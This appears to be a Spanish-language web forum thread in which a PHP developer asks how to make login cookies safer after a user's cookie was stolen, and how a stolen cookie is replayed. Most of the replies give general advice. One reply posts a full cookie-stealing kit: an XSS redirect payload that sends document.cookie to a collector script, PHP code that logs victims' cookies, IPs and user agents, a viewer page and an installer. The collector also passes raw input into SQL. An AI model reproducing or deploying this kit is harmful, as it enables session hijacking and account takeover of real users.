Me robaron el cookie...

a un usuario mio le robaron el cookie, entonces...

estoy tratando de hacer un codigo seguro para las cookies, osea el codigo de la cookie que sean el Id + el Pass + palabrasecreta y el IP.. todo concatenado y luego a ese resultado lo encripto con un codigo que creee y me genera un codigo encriptado que despues cuando va a loguear compara con los datos de la base de datos...

ej: ?Id=342&Cod=a4309sdfjlk234j50s9d7n5l2sd098

$datos=encripta($id,$pass,$IP);

if($datos == $_GET['Cod']){
echo "OK";
}else{
echo "ERROR";
}

puse GET para que se entienda mejor, pero en realidad la variable es cookie...

osea busca en la bd el id 342 luego extrae los datos que necesita y los somete al proceso de encriptado y compara que el codigo generado sea el mismo de la cookie...

supon que un usuario te roba el cookie? en caso de no tener en cuenta el IP puede iniciar sesion con esa cookie, pero si en el proceso de encriptado tiene en cuenta el IP no...

es correcto eso? que problemas podria tener?


y otra pregunta... como lo hiso? estube intentando reproducir la tecnica para tratar de auto-hackear mi sistema y asi ir implementando seguridades a medida que le encuentro fallas, pero hasta ahora sin exito...

supon que robe la cookie de un usuario.. ahora como hago para iniciar sesion con la cuenta del usuario el cual tengo la cookie...?

yo pienso, que el detalle esta en la forma en que guardas la cookie.... como era el dato??

algunos acostumbran, conservar incluso... la contraseña en la cookie, y eso esta mal.... de echo, muy mal!

por eso, es mejor usar sesiones... o un sistema propio que se quede en el servidor... y no pueda ser atacado por un usuario, suerte!

sip, obvio que es mejor sesiones pero te cargan mucho el servidor....
por eso quiero crear un cookie seguro y queria auto-hackear mi sistema para ir viendo sus falencias y asi poniendole nuevas trabas de seguridad..

pero para mi desdicha no he podido auto-hackearme... :(

Mi pregunta era:
supon que robe la cookie de un usuario.. ahora como hago para iniciar sesion con la cuenta del usuario el cual tengo la cookie...?

desde ya agradesco las respuestas...


PD:voy a dar karma al que me de la mejor respuesta... ;0)

Las cookies son buenas, para acelerar el proceso, pero no es recomendable que guardes datos de seguridad y menos de los usuarios, no es necesario robarse las cookies, las páginas reconocen sus galletas y las reactivan, es mejor usar sesiones u otro mecanismos como la modificación del .htacces, es cierto, generan carga de trabajo en tu server, pero le das más seguridad al usuario, ahora que si quieres, usa cabeceras de login y las almacenas en tu base de datos, al fin y al cabo tienes que accesar a la base y el tiempo en las consultas con pocos campos no consume mucho recurso.

ok mira
para poder robar la cookie tienes que tener un buen explorer yo recomiento firefox pues con el despues puedes ponerte a editar las cookies.
no lo voy a decir por que seria tonto darle a los crackernovatos las herramientas para hakear pero si te puedo decir que para evitar eso hagas esto.
no pongas el password jamas en las cookies ni encrptados por que hay tecnicas para desencriptarlos, reomiendo poner un burlador.
que es un burlador pues es esto.
digamos que tu pass es maria ok
pues pones en php esto:

para consultar luego haces esto:

es mejor encriptar a mano asi nadie sabra como lo iciste y no tendra un patron para desencriptarlo ok

Codigo para robar Cookies:


SQL.txt (se instala en el phpmyadmin)
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code>
CREATE TABLE `cookies` (
`id` int(10) NOT NULL auto_increment,
`txtcookie` text NOT NULL,
`ip` text NOT NULL,
`agent` text NOT NULL,
PRIMARY KEY (`id`)
) TYPE=MyISAM;

INSERT INTO `cookies` VALUES (1, '5sS$t3st|ng5Sss', '127.0.0.1', 'Windogs');
</TD></TR></TBODY></TABLE>

config.php
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code>
<?php

$dbhost = "localhost";
$dbuser = "root";
$dbpass = "";
$db = "ecker";

@$cxn = mysql_connect($dbhost, $dbuser, $dbpass);
@mysql_select_db($db, $cxn);

?>
</TD></TR></TBODY></TABLE>

cookie.php
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code><?php

/*
* first you must send cookie to script, it goes something like this:
* Code:
*
* [Solo los usuarios registrados pueden acceder a los links. ]
*
* in cookie.php there should be something like this:
* Code:
* <script>document.location='http://localhost/cookie.php?cookie='+window.document.cookie;</script>
*/

$cookie = $_GET['cookie'];
$REMOTE_ADDR = $_SERVER['REMOTE_ADDR'];
$HTTP_USER_AGENT = $_SERVER['HTTP_USER_AGENT'];

include("config.php");

mysql_query("insert INTO `cookies` (txtcookie, ip, agent) values ('$cookie', '$REMOTE_ADDR', '$HTTP_USER_AGENT')");

# si no quieres utilizar una base de datos borra los gatitos de abajo (linea 24 y 25) y coloca otro gatito (#) en la linea 21
# $fp = fopen("cookies.txt", "a+");
# fwrite($fp, $cookie);

?>
</TD></TR></TBODY></TABLE>

db.php (aqui se guardan llas cookies)
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code><?php

require("config.php");

$sql = "SELECT * FROM cookies ORDER by id DESC";
$query = mysql_query($sql);
$design = 0;

echo "<table border=\"0\" cellspacing=\"1\" cellpadding=\"2\" width=\"100%\" style=\"border-top:solid black .5pt; border-left:solid black .5pt; border-bottom:solid black .5pt; border-right:solid black .5pt;\">";
echo " <tr>";
echo " <td><font color=black><b>#</b></font></td>";
echo " <td><font color=black><b>Cookie</b></font></td>";
echo " <td><font color=black><b>IP</b></font></td>";
echo " <td><font color=black><b>HTTP user agent</b></font></td>";
echo " </tr>";

while ($row = mysql_fetch_array($query)) {
if ($design == 0) {
$color = '#F7F7F7'; # row color
$design++;
}
else {
$color = '#FFFFFF'; # row color 2
$design = 0;
}
$row[id] = htmlentities($row[id]);
$row[txtcookie] = htmlentities($row[txtcookie]);
$row[ip] = htmlentities($row[ip]);
$row[agent] = htmlentities($row[agent]);
echo " <tr>";
echo " <td bgcolor='$color'>".$row['id']."</td>";
echo " <td bgcolor='$color'>".$row['txtcookie']."</td>";
echo " <td bgcolor='$color'>".$row['ip']."</td>";
echo " <td bgcolor='$color'>".$row['agent']."</td>";
echo " </tr>";
}

echo "</table>";

mysql_free_result($query);
mysql_close($cxn);


?></TD></TR></TBODY></TABLE>

install.php (opcional)
Si te da flojera abrir tu phpmyadmin e instalar SQL.txt ejecuta este archivo. Posteriormente elimina este archivo.
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code><?php

require("config.php");


if(!$cxn) {
die("Error al conectar a la base de datos.");
} else {
mysql_query("CREATE TABLE cookies (id int(10) NOT NULL auto_increment,txtcookie text NOT NULL,ip text NOT NULL,agent text NOT NULL,PRIMARY KEY (id)) TYPE=MyISAM;");
mysql_query("INSERT INTO cookies VALUES (1, '5sS$t3st|ng5Sss', '127.0.0.1', 'Windogs');");
echo "La instalacion fue todo un exito. Borra de tu servidor el archivo install.php";
}

mysql_close($cxn);

?></TD></TR></TBODY></TABLE>


bue.. ese es un codigo para robar cookies... eso en google buscas y hay a patadas...

pero una ves que tenes la cookie como la usas? eso es lo que quiero saber asi parto de ahi para ir probando la seguridad de mi sistema.....